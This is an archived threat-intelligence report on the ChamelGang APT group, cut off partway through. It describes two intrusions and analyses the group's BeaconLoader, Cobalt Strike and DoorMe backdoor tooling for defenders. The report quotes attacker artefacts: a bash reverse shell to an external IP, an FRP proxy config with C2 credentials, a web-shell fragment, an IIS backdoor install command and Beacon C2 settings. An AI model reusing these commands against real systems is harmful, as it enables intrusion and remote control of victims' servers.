{ "id": "2dddad9e-1b7e-476c-9309-7b3c6160dd16", "created_at": "2026-04-06T00:06:48.823989Z", "updated_at": "2026-04-10T13:12:54.52278Z", "deleted_at": null, "sha1_hash": "c131afc01f35015dc79100f2e44834862fca3a93", "title": "Masters of Mimicry: new APT group ChamelGang and its arsenal", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1261428, "plain_text": "Masters of Mimicry: new APT group ChamelGang and its arsenal\r\nBy Positive Technologies\r\nPublished: 2021-08-19 · Archived: 2026-04-05 23:11:52 UTC\r\nContents\r\nIntroduction\r\n1. CASE #1\r\n1.1. Sequence of events\r\n1.2. Initial infection vector\r\n1.3. Lateral movement\r\n1.4. Data collection and exfiltration\r\n2. CASE #2\r\n2.1 Sequence of events\r\n2.2 Initial infection vector\r\n2.3 Lateral movement\r\n3. Analysis of malware and tools\r\n3.1. BeaconLoader and Cobalt Strike Beacon\r\n3.2. BeaconLoader and Cobalt Strike Beacon v2\r\n3.3. ProxyT\r\n3.4. DoorMe backdoor\r\n3.5. DoorMe backdoor v2\r\n4. Network infrastructure\r\n5. Victims\r\nConclusions\r\nVerdicts of our products\r\nRecomendations\r\nMITRE TTPs\r\nIOCs\r\nFile indicators\r\nNetwork indicators\r\nIntroduction\r\nIn Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The\r\ninvestigation revealed that the company's network had been compromised by an unknown group for the purpose of data\r\ntheft. We gave the group the name ChamelGang (from the word \"chameleon\"), because the group disguised its malware and\r\nnetwork infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google. The attackers\r\nemployed two methods. They acquired domains that imitate legitimate ones (newtrendmicro.com, centralgoogle.com,\r\nmicrosoft-support.net, cdn-chrome.com, mcafee-upgrade.com). In addition, the APT group placed SSL certificates that also\r\nimitated legitimate ones (github.com, www.ibm.com, jquery.com, update.microsoft-support.net) on its servers. To achieve\r\ntheir goal, the attackers used a trending penetration method—supply chain. The group compromised a subsidiary and\r\npenetrated the target company's network through it.\r\nAfter investigating the first incident, on August 16, 2021, as part of threat intelligence of the newly discovered group, PT\r\nESC specialists detected another successful attack (server compromise), identified a new victim, and notified the affected\r\norganization. This time, the criminals attacked a Russian company from the aviation production sector, and used a chain of\r\nProxyShell vulnerabilities for penetration.\r\nTo achieve their goals, the attackers used such well-known malicious programs as FRP, Cobalt Strike Beacon, and Tiny\r\nshell. They also used new, previously unknown malware (for example, ProxyT, BeaconLoader, and DoorMe backdoor).\r\nDespite the fact that we managed to conduct two successful investigations, we could not unequivocally attribute the\r\nattackers to any of the known APT groups. We named the new group ChamelGang (from the word \"chameleon\"), since in\r\nboth cases the group disguised its malware and network infrastructure under legitimate services of such companies as\r\nMicrosoft, TrendMicro, McAfee, IBM, and Google.\r\nCASE #1\r\n1.1. Sequence of events\r\nThe reason for the investigation was the multiple triggering of the company's antivirus products reporting the presence of\r\nCobalt Strike Beacon in RAM.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 1 of 31\n\n1.2. Initial infection vector\r\nAt the end of March 2021, the attackers compromised a subsidiary organization to gain access to the energy company's\r\nnetwork, using a vulnerable version of a web application on the JBoss Application Server platform. The investigation\r\nrevealed that the attackers, having exploited vulnerability CVE-2017-12149, were able to remotely execute commands on\r\nthe host.\r\nWhen analyzing the server logs, vuln6581362514513155613jboss records were found on the compromised host, indicating\r\nthat the public exploit jboss-_CVE-2017-12149 had been used.\r\nFigure 1. Example of how the exploit works\r\nFigure 2. Artifact on the compromised host\r\nAlso, the server.log logs contained all the command execution results. Note that the commands were those typically used for\r\nreconnaissance on hosts. The following one was the most noteworthy:\r\n \r\nCaused by: java.lang.Exception: [L291919]\r\nPING ci6i6b.dnslog.cn (127.0.0.1) 56(84) bytes of data.\r\n \r\nThe dnslog.cn service generates a random third-level domain, which will later be used to obtain information about the\r\navailability of infected hosts. The infected device tries to allow this domain. In case of success, the computer gains Internet\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 2 of 31\n\naccess, otherwise, it is located in a restricted access network. Below is an example of how the service works:\r\nFigure 3. Example of how the dnslog.cn service works\r\n1.3. Lateral movement\r\nTo control the compromised host and perform reconnaissance on it, the attackers used the following tools:\r\nSingle-line reverse shell:\r\n \r\nbash -i \u003e\u0026 /dev/tcp/115.144.122.8/5555 0\u003e\u00261\r\n \r\nTiny SHell (public UNIX backdoor)\r\nIt is able to:\r\n1. Receive a shell from an infected host,\r\n2. Execute a command,\r\n3. Transfer files.\r\nTo launch the malware with escalated privileges, the attackers used their own utility, which we called\r\nLinuxPrivilegeElevator.\r\nFigure 4. LinuxPrivilegeElevator main function\r\nThen the attackers managed to gain access to the Windows infrastructure of the subsidiary. As work directories, the attackers\r\nused:\r\nC:\\Windows\\Web;\r\nC:\\Windows\\System32\\wbem;\r\nC:\\Windows\\System32\\inetsrv;\r\nC:\\Windows\\Temp.\r\nTo gain persistence and escalate privileges on the infected hosts, the attackers used a rather old DLL Hijacking technique\r\nassociated with the MSDTC service. MSDTC is a Windows service responsible for coordinating transactions between\r\ndatabases (SQL server) and web servers. For more information about this technique, see the article by Trend Micro's experts.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 3 of 31\n\nAfter uploading the malicious BeaconLoader library (see «the Analysis of malware and tools section») and the encrypted\r\nCobalt Strike Beacon dlang.dat to a work directory suitable for DLL Hijacking, the attackers restarted the MSDTC service.\r\nDue to their actions on the host, event 4111 was recorded in the Windows logs. At startup, the service tries to load the\r\nfollowing three DLL files from C:\\Windows\\System32: oci.dll, SQLLib80.dll, and xa80.dll.\r\nFigure 5. Registry key with the path for the library\r\n(HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI))\r\nIn a specific case, the BeaconLoader role is performed by the oci.dll library.\r\nOn another compromised host, the attackers employed the DLL Hijacking technique, but with a different service. In this\r\ncase, the attackers uploaded a malicious library wlbsctrl.dll onto the host to the following folder: C:\\Windows\\System32.\r\nThen they restarted the IKEEXT service with the \"sc stop ikeext\" and \"sc start ikeext\" commands. The restarted service calls\r\nLoadLibraryExW and tries to load the library at C:\\Windows\\System32\\wlbsctrl.dll.\r\nFigure 6. Calling LoadLibraryExW\r\nThe library wlbsctrl.dll is also BeaconLoader, and Cobalt Strike Beacon encrypted for it is stored in the file at\r\nC:\\Windows\\Temp\\MpCmdRun.log.1.\r\nDuring the investigation, different payload configurations were detected. The HTTPS Beacon was used for hosts with direct\r\nInternet access, and the SMB Beacon, for communication with hosts in isolated network segments.\r\nAbout two weeks later, which we think to be rather fast, the attackers managed to compromise the parent company due to\r\nthe fact that its network was connected to the subsidiary's infrastructure. The attackers obtained the dictionary password of\r\nthe local administrator on one of the servers in an isolated segment and gained access to the network via RDP.\r\nAfter that, they conducted reconnaissance in the network using built-in system utilities:\r\nregsvr32.exe,\r\ncmd.exe,\r\nipconfig.exe,\r\ntaskmgr.exe,\r\nping.exe,\r\nnltest.exe,\r\nnetstat.exe,\r\ntasklist.exe,\r\nquser.exe,\r\nnslookup.exe.\r\nTo check the accessibility of control servers, the attackers used the Curl utility built into the Windows operating system and\r\n(or) their own ProxyTest utility (see «the Analysis of malware and tools section»). This utility is designed for checking the\r\nHTTP accessibility of a resource from remote computers.\r\nCommand examples:\r\ncurl -i http://42.99.116.14\r\ncurl -i https://jumper.funding-exchange.org\r\nproxyT.exe http://45.99.116.14\r\nThe infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang. This\r\nutility allows connecting to a reverse proxy server. The attackers' requests were routed using the socks5 plugin through the\r\nserver address (45.91.24.73:8996) obtained from the configuration data.\r\nHere is an example of a configuration file that was restored while analyzing the RAM dump of one of the infected hosts:\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 4 of 31\n\n[common]\r\nserver_addr = 45.91.24.73\r\nserver_port = 80\r\ntoken = 7tBjjTqYGmHg5PY8zYUL\r\n[mobi_socks5]\r\ntype = tcp\r\nremote_port =8996\r\nplugin = socks5\r\nuse_encryption = true\r\nuse_compression = true\r\ntls_enable = true\r\ndns_server = 8.8.8.8\r\nplugin_user = 95ReuhTj7Wd2Xfr\r\nplugin_passwd = XCWJt92Xxzb2L5N\r\n \r\nFRP was also used in attacks on government agencies in East Asia, as reported in the article by Avast's researchers.\r\nAfter studying the company's network for about two months and gaining control over most of it (including critical servers\r\nand hosts in different network segments), attackers installed a malicious module on one of the IIS servers (in this case, the\r\nExchange server), which turned out to be a DoorMe backdoor (see «the Analysis of malware and tools section») and worked\r\nin the context of the web server process w3wp.exe. We assume that this was done to reserve the management channel of the\r\ncompromised infrastructure. This technique was described earlier in the article IIS Raid — Backdooring IIS Using Native\r\nModules and used by the APT group OilRig. In early August 2021, at the Black Hat conference, ESET presented detailed\r\ninformation about the family of malicious IIS modules, which indicates the growing popularity of this technique among\r\nattackers.\r\nIn attacks, DoorMe was installed using the console command:\r\n \r\nc:\\windows\\system32\\inetsrv\\appcmd.exe install module /name:FastCgiModule_64bit /image:%windir%\\System32\\inets\r\n \r\nIf the command is executed successfully, the module parameters are saved in the configuration file applicationhost.config.\r\nChoosing the name FastCgiModule_64bit for the malicious module is also a method to counter forensics. The attackers\r\ndisguised the new module as an existing legitimate module by adding the x64 bit capacity to the name.\r\nFigure 7. Configuration file applicationhost.config\r\nAt the same time, the official Microsoft website recommends to exclude some folders on Exchange servers from antivirus\r\nscanning for stable server operation. The folder %SystemRoot%\\System32\\Inetsrv containing IIS server web components,\r\nwhere DoorMe was located, also falls into this category. This folder was excluded from scanning by the antivirus used in the\r\ntarget company.\r\nDuring the investigation, DoorMe was not detected by antivirus protection tools.\r\n1.4. Data collection and exfiltration\r\nThe attackers collected data on the compromised hosts using certain masks:\r\n \r\n7z.exe a -padminadmin -mhe=on -mx9 his.7z hist*\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 5 of 31\n\nAfter collecting the data, they placed it on web servers on the compromised network for further downloading them using the\r\nWget utility.\r\n \r\n2021-04-01 09:03:34 *.*.*.* GET /aspnet_client/system_web/favicon.rar - 443 - 172.104.109.12 Wget/1.20.3+(linu\r\n \r\nCASE #2\r\n2.1 Sequence of events\r\nDuring threat intelligence of the ChamelGang group on August 16, 2021, PT ESC experts found fresh traces of server\r\ncompromise in another company that became a victim of this group. This time, the criminals attacked an organization from\r\nthe Russian aviation production sector. We notified the affected company on time—four days after the server was\r\ncompromised—and, in cooperation with its employees, promptly eliminated the threat. In total, the attackers remained in the\r\nvictim's network for eight days, and two weeks passed from the moment of notification to the completion of the incident\r\nresponse and investigation. According to our data, the APT group did not expect that its backdoors would be detected so\r\nquickly, so it did not have time to develop the attack further.\r\n2.2 Initial infection vector\r\nTo penetrate the victim's infrastructure, the attackers exploited a chain of related vulnerabilities in Microsoft Exchange\r\n(CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) called ProxyShell. It first became known from a report presented\r\nat the the Black Hat conference on August 5, 2021 (the next day the researcher published a detailed article), after which\r\nvarious APT groups began to actively exploit this chain of vulnerabilities. The first POC scripts appeared on GitHub on\r\nAugust 13, 2021.\r\nThe stages of ProxyShell exploitation by ChamelGang are as follows:\r\nCVE-2021-34473—bypassing the ACL. The vulnerability allows attackers to specify the mailbox address through the\r\nrequest string in the EwsAutodiscoverProxyRequestHandler handler. This, in turn, grants them access to an arbitrary\r\nURL with NT AUTHORITY\\SYSTEM rights.\r\n17.08.2021 1:20:31 W3SVC1 - - POST /autodiscover/autodiscover.json @VICTIM.COM:444\r\nCVE-2021-34523—privilege reduction. Since there is no mailbox for the user NT AUTHORITY\\SYSTEM, at this\r\nstage, the attackers get a valid domain SID of the local administrator. In the future, the SID is used for the X-Rps-CAT parameter.\r\n17.08.2021 1:20:34 W3SVC1 - - POST /autodiscover/autodiscover.json @VICTIM.COM:444\r\nAt this stage, attackers create a draft letter through the Exchange Web Service (EWS). The POST request passes a\r\nSOAP element with a draft message.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 6 of 31\n\n17.08.2021 1:20:41 W3SVC1 - - POST /autodiscover/autodiscover.json @VICTIM.COM:444\r\nFigure 8. Drafts with a payload in the mailbox\r\nCVE-2021-31207—the ability to write to a file with subsequent remote code execution. Attackers use PowerShell\r\ncmdlets: New-ManagementRoleAssignment to get the role of importing and exporting mailboxes and New-MailboxExportRequest to export the mailbox to the web server directory.\r\n17.08.2021 1:20:46 W3SVC1 - - POST /autodiscover/autodiscover.json @VICTIM.COM:444\r\nNext, a mail PST file with the signature (magic) !BDN (0x21, 0x42, 0x44, 0x4E) and the .aspx extension is uploaded\r\nto the file system.\r\n\"New-MailboxExportRequest\", \"-Mailbox \\\"Administrator\\\" -IncludeFolders (\\\"#Drafts#\\\") -ContentFilter \\\r\nIn the contents of the target file, after applying the permutation encoding NDB_CRYPT_PERMUTE , you can notice\r\na single-line web shell.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 7 of 31\n\nFigure 9. Contents of the PST file\r\nscript Language=\"C#\" runat=\"server\"\u003evoid Page_Load(object s, EventArgs e){System.IO.File.WriteAllText(C\r\nAttackers send a GET request to the web shell.\r\n17.08.2021 1:29:25 W3SVC1 - - GET /aspnet_client/468749030.aspx - 443\r\nAfter the successful installation of the web shell, the attackers downloaded functional web shells and began to conduct\r\nreconnaissance on the compromised node. To detect attempts to exploit the vulnerability chain in the logs of the IIS server,\r\nyou can use publicly available YARA signatures (useful information about these vulnerabilities can be found in these\r\nmaterials).).\r\n2.3 Lateral movement\r\nThe attackers exercised control over the infected nodes using ASPX web shells:\r\nTunnel.aspx;\r\nFileupload.aspx;\r\nErrors.aspx;\r\nTest.aspx.\r\nAfter gaining a foothold on the infected nodes, the attackers installed the backdoor DoorMe v2 (see the Analysis of malware\r\nand tools section) on two mail servers (Microsoft Exchange Server) on the victim's network. Selection of the names of\r\nmalicious libraries (modrpflt.dll, protsdown.dll) and the names of the IIS server modules (modrpflt, protsdown) was an\r\nattempt to disguise malware as legitimate libraries. To hide malicious files, the attackers also changed timestamps\r\n(Timestomp) and assigned them the values of legitimate files.\r\nFigure 10. Configuration file applicationhost.config\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 8 of 31\n\nFigure 11. Timestomp of the malicious library\r\nThe attackers used a modified version of the DoorMe backdoor. Presumably, they modified the backdoor after its sample\r\nwas uploaded to VirusTotal. As a result of the new obfuscation, most antivirus engines stopped detecting this malware.\r\nFigure 12. Antivirus engine detections for the old file\r\nFigure 13. Antivirus engine detections for the new file\r\nAn example of executing a command through the DoorMe backdoor in the IIS logs:\r\n17.08.2021 7:11:27 W3SVC1 - - POST /owa/ - 443 - 91.204.227.130 HTTP/1\r\nTo move inside the network and infect user nodes, the attackers used BeaconLoader (see the Analysis of malware and tools).\r\nTo launch it, the attackers used the previously described launch technique through the MSDTC service. After launching, this\r\nservice loads the library oci.dll, which launches Cobalt Strike Beacon (dlang.dat).\r\n3. Analysis of malware and tools\r\n3.1. BeaconLoader and Cobalt Strike Beacon\r\nAs we have mentioned before, BeaconLoader is uploaded using DLL Hijacking. At the first stage, the library receives the\r\naddresses of the functions and libraries necessary for its operation. Then, it checks the name of the parent process and the\r\nprivilege type (for further work, the SYSTEM type and names msdtc.exe, msdtc.exe.mui, and vmtoolsd.exe are required).\r\nThese names are located inside the binary file in encrypted form, and their decryption occurs according to one and the same\r\nunusual scheme: each value is placed in a separate register, and after that each of the registers is separately added modulo 2\r\nto a single-byte value and copied to the stack.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 9 of 31\n\nFigure 14. Code for decrypting process names\r\nAlso, note the use of direct native calls inside the library (Figure 15) to create a new thread if the process name is correct, as\r\nwell as to work with memory.\r\nFigure 15. Starting a new thread\r\nNext, the library decrypts the name of the file with the payload (Figure 16) and then reads it. Note that the file itself must be\r\nlocated in the same directory as the library.\r\nFigure 16. Name of the file with the payload\r\nThen the main payload is decrypted. In the beginning, the first 16 bytes are separated from the file (highlighted in red in\r\nFigure 17)—these bytes will be the basis for preparing the decryption key.\r\nFigure 17. Encryption key inside the file\r\nThen comes the first stage of the decryption key preparation— one cycle of preparing the 16 separated bytes of the file. The\r\nprocedure is as follows: each byte is added modulo 2 to the following value (see Figure 18 for the example for the first 6\r\nbytes). Also, at some stages, the constants stored in registers are modified, on the basis of which the value of the encryption\r\nkey can change at a specific stage.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 10 of 31\n\nFigure 18. First six iterations of the encryption key modification\r\nAfter that, an MD5 hash is read from the received data. The resulting value will be the required encryption key.\r\nThe main payload is decrypted by the AES algorithm in CBC mode, with a 16-byte key obtained at the preparation stage and\r\na zero (empty) initialization vector.\r\nFigure 19. Decrypted payload\r\nAfter decryption, the security attributes for the specified memory area are changed (via NtProtectVirtualMemory), after\r\nwhich control is transferred to them in a new thread.\r\nIn another version of BeaconLoader, which was uploaded using the IKEEXT service, many sections of the code are identical\r\nto the previous ones, but there are still many differences.\r\nIn the beginning, the process name is also checked—in this case, the process name should be svchost.exe. Next, the file\r\nC:\\Windows\\Temp\\MpCmdRun.log.1 is read; as in the previous case, it contains a payload. The encryption scheme at the\r\nfirst stage is different from that in oci.dll: here, the first 4 bytes contain the key for XOR decryption of the remaining data.\r\n(The key is highlighted in red in Figure 20)\r\nFigure 20. Four-byte key and encrypted data\r\nThe decryption of the first stage does not include the modification of the encryption key at any of the stages and consists in a\r\nnormal four-byte XOR.\r\nFigure 21. XOR decryption cycle\r\nThe decrypted data has the following structure:\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 11 of 31\n\ntypedef struct decryptedData\r\n{\r\nDWORD null;\r\nDWORD sizeOfDecryptedData;\r\nchar encryptionKey[32];\r\nchar dataToDecrypted[sizeOfDecryptedData];\r\n} decryptedData, *pdecryptedData;\r\n \r\nNote that the sizeOfDecryptedData value differs from the original file size by 41: two service fields and the encryption key\r\nare included here.\r\nFigure 22. Data decrypted at the first stage\r\nAt the next stage, the initialization vector for the AES algorithm is formed. This value is obtained by MD5 hashing of the\r\nencryption key 741668454FFA04A95EBA720E1B74A5B3 (encryptionKey field), and after that the main payload is\r\ndecrypted with these parameters in AES_CBC mode.\r\nFigure 23. Decrypted payload\r\nIn both cases, Cobalt Strike Beacon was the payload, and in the case of oci.dll, the SMB Beacon was decrypted and\r\nlaunched, and in the second case, the HTTPS Beacon.\r\nInvestigating the first incident, we found two versions of Cobalt Strike Beacon: one for interaction over SMB, the other over\r\nHTTPS. The configurations of these two versions are shown below.\r\nHTTPS Beacon\r\nBeaconType HTTPS\r\nPort 443\r\nPublicKey_MD5 5a178220c2514f49a16f0eb6d9dc2a37\r\nC2Server www.funding-exchange.org,/Home.aspx\r\nUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nEdge/17.17134\r\nHttpPostUri\r\n/BecomeMember.aspx\r\nMalleable_C2_Instructions - Remove 2365 bytes from the end\r\nRemove 824 bytes from the beginning\r\nBase64 URL-safe decode\r\nXOR mask w/ random key\r\nHttpGet_Metadata ConstHeaders\r\nAccept: application/xhtml+xml;q=0.9,*/*;q=0.8\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 12 of 31\n\nHost: www.thefundingexchange.com\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nCache-Control: max-age=0\r\nMetadata\r\nbase64url\r\nprepend \"check=true;ASP.NET_SessionId=\"\r\nheader \"Cookie\"\r\nHttpPost_Metadata\r\nConstHeaders\r\nAccept: application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nHost: www.thefundingexchange.com\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nCache-Control: max-age=0\r\nSessionId\r\nmask\r\nbase64url\r\nparameter \"_s_token\"\r\nOutput\r\nmask\r\nbase64url\r\nprint\r\nSSH_Banner Host: www.funding-exchange.org\r\nWatermark 1936770133\r\nHostHeader Host:www.funding-exchange.org\r\nSMB Beacon\r\nBeaconType SMB\r\nPort 4444\r\nPublicKey_MD5 5a178220c2514f49a16f0eb6d9dc2a37\r\nPipeName \\\\.\\pipe\\Winsock2\\CatalogChangeListener98df\r\nWatermark 1936770133\r\nBoth versions have the same Watermark 1936770133, which we did not notice in other attacks.\r\nWhen accessing the C2 server www.funding-exchange[.]org, the user is redirected to the website thefundingexchange[.]com.\r\nHowever, we did not notice any malicious activity on this site.\r\nFigure 24. Home page of the website to which the user is redirected\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 13 of 31\n\n3.2. BeaconLoader and Cobalt Strike Beacon v2\r\nDuring the investigation of the second incident, two versions of the Cobalt Strike Beacon were discovered—their\r\nconfigurations are shown below.\r\nBeaconType HTTPS\r\nPort 443\r\nPublicKey_MD5 d4ec8d5e82af77b8488abd5264aedf02\r\nC2Server static.mhysl.org,/images/L._SX2_.jpg\r\nUserAgent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHttpPostUri /action/view.aspx\r\nWatermark 1028153346\r\nBeaconType Hybrid HTTP DNS\r\nPort 1\r\nPublicKey_MD5 d4ec8d5e82af77b8488abd5264aedf02\r\nC2Server snn2.mhysl.org,/images/button_5x5.jpg,snn1.mhysl.org,/images/L._SX2_.jpg,snn3.mhysl.org,/images/button_5x5.jpg\r\nUserAgent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\nHttpPostUri /action/update.aspx\r\nWatermark 1028153346\r\nWatermark 1028153346 is unique and has not been previously found in publicly available sources.\r\n3.3. ProxyT\r\nThe application is designed to check whether there is a connection to a remote URL. The URL address is passed to the\r\nprogram as a parameter, after which the program divides it into components by calling InternetCrackUrlA. If this cannot be\r\ndone, the program ends, and \"Error on InternetCrackUrl: error_code\" is displayed in the console.\r\nNext, an attempt is made to create a connection descriptor (InternetOpenA; in case of an error, the console shows: \"Error On\r\nInternetOpen: error_code\") and initialize the connection (InternetConnectA; similarly, either \"Error On InternetConnect:\r\nerror_code\" or \"Error On INTERNET_SCHEME: error_code\" will be displayed).\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 14 of 31\n\nFigure 25. Main logic of the application\r\nNext, a GET request is formed and sent to the server. In case of an error, its code is also displayed in the console (Figure 25).\r\nThe HttpQueryInfoA function with the HTTP_QUERY_RAW_HEADERS_CRLF parameter is responsible for getting\r\nheaders from the server response. This parameter means that all server response headers will be returned, and each of the\r\nheaders will be separated by a carriage return character.\r\nAfter receiving the headers, all of them are output to the console (fnPrintToConsole_fromReg function).\r\n3.4. DoorMe backdoor\r\nAmong the malware samples we found during the incident investigation, the DoorMe backdoor is the most interesting.\r\nBasically, it is a native IIS module that is registered as a filter through which HTTP requests and responses are processed.\r\nThe file has two entry points: the main one, which does not have any set of functions, and the second one—RegisterModule,\r\nwhich is required for registering the native module—it initializes an instance of the DoorMe class. The name alludes to\r\nbackdoor functionality. We did not find any mention of a similar backdoor in public sources.\r\n \r\n__int64 __fastcall RegisterModule(__int64 a1, __int64 a2)\r\n{\r\n _QWORD *v3; // rax\r\n v3 = operator new(8ui64);\r\n *v3 = \u0026Doorme::`vftable';\r\n return (*(*a2 + 24i64))(a2, v3, 0x100i64);\r\n}\r\n \r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 15 of 31\n\nThe original code has the same debugging lines as in the backdoor we found, which indicates that certain handlers were not\r\nimplemented in the backdoor:\r\n \r\n__int64 CGlobalModule::OnGlobalStopListening()\r\n{\r\n OutputDebugStringA(\"This module subscribed to event \");\r\n OutputDebugStringA(\"CGlobalModule::OnGlobalStopListening\");\r\n OutputDebugStringA(\r\n \" but did not override the method in its CGlobalModule implementation. Please check the method signature\r\n DebugBreak();\r\n return 0i64;\r\n}\r\n \r\nFigure 26. Debugging message in one of the functions from the Microsoft IIS.Common repository\r\nThe module creates its own handler for the OnGlobalPreBeginRequest event, which is launched before processing a request\r\nreceived on the web interface of a web application on IIS.\r\nThe handler is obfuscated; almost all strings are encrypted with XOR, which complicates its analysis.\r\n \r\n v15 = 0x7B;\r\n strcpy(IISSessions.m128i_i8, \"{22((\\x1E\\b\\b\\x12\\x14\\x15\\b\");\r\n v16 = 0i64;\r\n while ( 1 )\r\n {\r\n IISSessions.m128i_i8[++v16] ^= v15;\r\n if ( v16 \u003e= 0xB )\r\n break;\r\n v15 = IISSessions.m128i_i8[0];\r\n }\r\n IISSessions.m128i_i8[12] = 0;\r\n \r\nThe logic of the handler is as follows:\r\nIn total, there are six different commands that this backdoor can receive. The separator between the command and its\r\nargument is the pipe symbol: |\r\nCommand Value\r\n0 Return the current directory, username, and hostname\r\n1 Run an arbitrary command by cmd.exe /c \u003ccommand\u003e\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 16 of 31\n\n2 Run an arbitrary command by creating a new process\r\n3 Write a file\r\n4 Another way to write a file\r\n5 Copy the timestamps from file A to file B\r\nThe results of the command execution are returned in encrypted form.\r\n3.5. DoorMe backdoor v2\r\nWhen investigating the second incident, we found an expanded version of this backdoor: the obfuscation has changed, and\r\nnew commands have appeared. However, the name of the class containing overridden methods that implement a set of\r\nbackdoor functions remains the same—DoorMe.\r\nFigure 30. Using the DoorMe class\r\nTo complicate the analysis, control flow obfuscation with a dispatcher is used:\r\nFigure 31. Control flow obfuscation\r\nSome of the sensitive strings of this backdoor now are in cleartext, and some others are subject to the following obfuscation\r\nscheme:\r\n \r\nc: uint8 constant\r\nstring[i] = (c \u0026 x[i] | ~c \u0026 y[i]) ^ z[i]\r\n \r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 17 of 31\n\nFigure 32. String obfuscation\r\nLooking carefully at the values x[i] and y[i], you can see that they are the inverse of each other. Thus, the final formula for\r\neach byte can be simplified:\r\n \r\nstring[i] = (c \u0026 x[i] | ~c \u0026 y[i]) ^ z[i]\r\nstring[i] = (c \u0026 x[i] | ~c \u0026 ~x[i]) ^ z[i]\r\nstring[i] = (c \u0026 x[i] | ~c \u0026 ~x[i]) ^ z[i]\r\nstring[i] = ~(c ^ x[i]) ^ z[i]\r\nstring[i] = c ^ ~x[i] ^ z[i]\r\n \r\nInterestingly, this formula comes down to two XORs, and given the fact that the code uses the same pairs of x and z, we can\r\nsay that the generator of these strings is even simpler than it could be.\r\nUnlike IDA Pro, Ghidra simplifies these equations, although it does not cope with all of them:\r\nFigure 33. String obfuscation in the Ghidra decompiler\r\nIn addition, a technique is used that \"breaks\" IDA Pro: it incorrectly splits the function, which causes some nodes of the\r\ngraph to disappear from the decompiler.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 18 of 31\n\nFigure 34. Antidebugging method\r\nThe IDAPython script solves this problem:\r\n \r\ndef kill_gaps():\r\nstart_func_addr = here()\r\nfi = FuncItems(start_func_addr)\r\nlast_addr = 0\r\nfor cur_addr in fi:\r\n#print(\"cur_addr\", hex(cur_addr))\r\ninsn = idaapi.insn_t()\r\nif not last_addr:\r\nlast_addr = cur_addr\r\nelse:\r\nlast_inst_len = idaapi.decode_insn(insn, last_addr)\r\nsize_between_opcodes = cur_addr - last_addr\r\ngap = size_between_opcodes - last_inst_len\r\nif gap:\r\nprint(f\"{hex(last_addr)} - {hex(cur_addr)} Possibly gap {gap}, last_in\r\nif gap \u003e 2 and idc.get_bytes(cur_addr - 2, 2) == b\"\\x00\\x00\":\r\nprint(\" Probably align\")\r\nlast_addr = cur_addr\r\ncontinue\r\nprint(f\"Trying to recover: {hex(last_addr+last_inst_len)}\")\r\n#del_items(cur_addr)\r\ncreate_insn(last_addr+last_inst_len)\r\nfor _ in range(3):\r\ndel_items(cur_addr+_)\r\ncreate_insn(last_addr+last_inst_len)\r\nfor _ in range(3):\r\ncreate_insn(cur_addr+_)\r\n#create_insn(cur_addr-inst_len)\r\nlast_addr = cur_addr\r\nkill_gaps ()\r\nCompared to the previous version, the number of commands has increased to eleven:\r\nCommand Value\r\n0 Return the current directory, username, and hostname\r\n1 Run an arbitrary command by cmd.exe /c \u003ccommand\u003e\r\n2 Run an arbitrary command by creating a new process\r\n3 Write a file\r\n4 Another way to write a file\r\n5 Copy the timestamps from file A to file B\r\n6 Return the current working directory of the application\r\n7 Another way to return the current working directory of the application\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3\r\nPage 19 of 31\n\n8\r\nGet information about the contents in the selected directory, pass the file type, its size, the date of the last\r\nchange, and the name in the form of a table: Size Type Last Modified Name\r\n9 Get a list of processes in the form of a 